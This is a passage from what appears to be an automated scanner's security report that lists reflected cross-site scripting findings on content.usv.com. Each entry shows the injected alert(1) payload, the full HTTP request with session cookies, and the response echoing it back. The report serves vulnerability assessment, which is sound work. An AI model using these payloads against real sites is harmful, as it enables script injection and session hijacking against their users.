The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c198e"><script>alert(1)</script>7641f5bdca4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesc198e"><script>alert(1)</script>7641f5bdca4/bug-labs HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __qca=P0-1120347815-1317847383708; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.1.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.5.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:44:58 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31838
Date: Wed, 05 Oct 2011 20:44:58 GMT
X-Varnish: 1169901890
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pagesc198e"><script>alert(1)</script>7641f5bdca4/bug-labs%0AServer: content.usv.com%0APath: /pagesc198e">
...[SNIP]...

3.147. http://content.usv.com/pages/canvas [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/canvas

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74aae"%3balert(1)//4ca3695d6d4 was submitted in the REST URL parameter 1. This input was echoed as 74aae";alert(1)//4ca3695d6d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages74aae"%3balert(1)//4ca3695d6d4/canvas HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; _chartbeat2=60p1quo02ok51v53.1317847385405; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.3.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.7.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:17 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31723
Date: Wed, 05 Oct 2011 20:45:17 GMT
X-Varnish: 1169903850
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
xt/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/pages74aae";alert(1)//4ca3695d6d4/canvas";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document.locati
...[SNIP]...

3.148. http://content.usv.com/pages/canvas [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/canvas

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72f0f"><script>alert(1)</script>d3ee7e4f618 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages72f0f"><script>alert(1)</script>d3ee7e4f618/canvas HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; _chartbeat2=60p1quo02ok51v53.1317847385405; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.3.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.7.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:15 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31828
Date: Wed, 05 Oct 2011 20:45:16 GMT
X-Varnish: 1169903748
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pages72f0f"><script>alert(1)</script>d3ee7e4f618/canvas%0AServer: content.usv.com%0APath: /pages72f0f">
...[SNIP]...

3.149. http://content.usv.com/pages/covestor [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/covestor

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1265d"%3balert(1)//705653a3bf2 was submitted in the REST URL parameter 1. This input was echoed as 1265d";alert(1)//705653a3bf2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages1265d"%3balert(1)//705653a3bf2/covestor HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; _chartbeat2=60p1quo02ok51v53.1317847385405; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.6.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.18.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:04:16 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31733
Date: Wed, 05 Oct 2011 21:04:16 GMT
X-Varnish: 650529180
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
xt/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/pages1265d";alert(1)//705653a3bf2/covestor";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document.loca
...[SNIP]...

3.150. http://content.usv.com/pages/covestor [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/covestor

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4a68"><script>alert(1)</script>a29211bf554 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesc4a68"><script>alert(1)</script>a29211bf554/covestor HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; _chartbeat2=60p1quo02ok51v53.1317847385405; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.6.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.18.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:04:15 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31838
Date: Wed, 05 Oct 2011 21:04:15 GMT
X-Varnish: 650529093
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pagesc4a68"><script>alert(1)</script>a29211bf554/covestor%0AServer: content.usv.com%0APath: /pagesc4a68">
...[SNIP]...

3.151. http://content.usv.com/pages/gary-chou [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/gary-chou

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c83f9"%3balert(1)//97441585075 was submitted in the REST URL parameter 1. This input was echoed as c83f9";alert(1)//97441585075 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pagesc83f9"%3balert(1)//97441585075/gary-chou HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/team/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.9.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.22.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=af1fbe8bce28ace8e37c4e3b99d9c1c5; path=/; expires=Thu, 06-Oct-2011 21:19:49 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31724
Date: Wed, 05 Oct 2011 21:19:49 GMT
X-Varnish: 650612289
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
xt/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/pagesc83f9";alert(1)//97441585075/gary-chou";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document.loc
...[SNIP]...

3.152. http://content.usv.com/pages/gary-chou [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/gary-chou

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f01f6"><script>alert(1)</script>63c7deabc70 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesf01f6"><script>alert(1)</script>63c7deabc70/gary-chou HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/team/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.9.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.22.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=af1fbe8bce28ace8e37c4e3b99d9c1c5; path=/; expires=Thu, 06-Oct-2011 21:19:48 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31829
Date: Wed, 05 Oct 2011 21:19:48 GMT
X-Varnish: 650612225
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pagesf01f6"><script>alert(1)</script>63c7deabc70/gary-chou%0AServer: content.usv.com%0APath: /pagesf01f6">
...[SNIP]...

3.153. http://content.usv.com/pages/hashable [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/hashable

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6caad"><script>alert(1)</script>827854c5c88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages6caad"><script>alert(1)</script>827854c5c88/hashable HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.18.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.7.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:04:18 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31838
Date: Wed, 05 Oct 2011 21:04:18 GMT
X-Varnish: 650529312
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pages6caad"><script>alert(1)</script>827854c5c88/hashable%0AServer: content.usv.com%0APath: /pages6caad">
...[SNIP]...

3.154. http://content.usv.com/pages/hashable [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/hashable

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f646"%3balert(1)//0778822b38e was submitted in the REST URL parameter 1. This input was echoed as 7f646";alert(1)//0778822b38e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages7f646"%3balert(1)//0778822b38e/hashable HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.18.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.7.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:04:19 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31733
Date: Wed, 05 Oct 2011 21:04:19 GMT
X-Varnish: 650529418
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
xt/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/pages7f646";alert(1)//0778822b38e/hashable";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document.loca
...[SNIP]...

3.155. http://content.usv.com/pages/john-buttrick [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/john-buttrick

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34dba"><script>alert(1)</script>1b2d7d1fc8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages34dba"><script>alert(1)</script>1b2d7d1fc8d/john-buttrick HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/team/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.4.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 20:43:28 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31849
Date: Wed, 05 Oct 2011 20:43:29 GMT
X-Varnish: 1169892431
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pages34dba"><script>alert(1)</script>1b2d7d1fc8d/john-buttrick%0AServer: content.usv.com%0APath: /pages34dba">
...[SNIP]...

3.156. http://content.usv.com/pages/john-buttrick [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/john-buttrick

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82c12"%3balert(1)//83ae392392d was submitted in the REST URL parameter 1. This input was echoed as 82c12";alert(1)//83ae392392d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages82c12"%3balert(1)//83ae392392d/john-buttrick HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/team/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.4.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 20:43:29 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31744
Date: Wed, 05 Oct 2011 20:43:30 GMT
X-Varnish: 1169892519
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
xt/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/pages82c12";alert(1)//83ae392392d/john-buttrick";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document
...[SNIP]...

3.157. http://content.usv.com/pages/skillshare [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/skillshare

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abd56"%3balert(1)//e892091a97f was submitted in the REST URL parameter 1. This input was echoed as abd56";alert(1)//e892091a97f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pagesabd56"%3balert(1)//e892091a97f/skillshare HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
